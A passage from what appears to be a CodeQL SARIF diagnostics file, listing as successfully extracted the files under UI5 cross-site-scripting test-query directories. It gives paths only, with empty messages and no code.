"message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 302 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 303 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 304 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 305 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 306 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 307 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 308 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 309 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 310 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 311 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 312 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 313 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 314 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 315 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 316 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 317 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 318 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 319 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 320 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 321 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 322 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 323 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 324 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 325 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 326 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 328 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 329 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 330 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 332 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 333 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 334 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 335 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 336 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 337 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 338 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 339 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 340 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 341 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 342 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 343 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json", - "uriBaseId" : "%SRCROOT%", - "index" : 344 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 345 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 346 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 347 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 349 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 350 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 351 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 352 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 353 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 354 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 355 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 356 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 357 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 358 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 359 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 360 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", - "uriBaseId" : "%SRCROOT%", - "index" : 361 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 362 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 363 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", - "uriBaseId" : 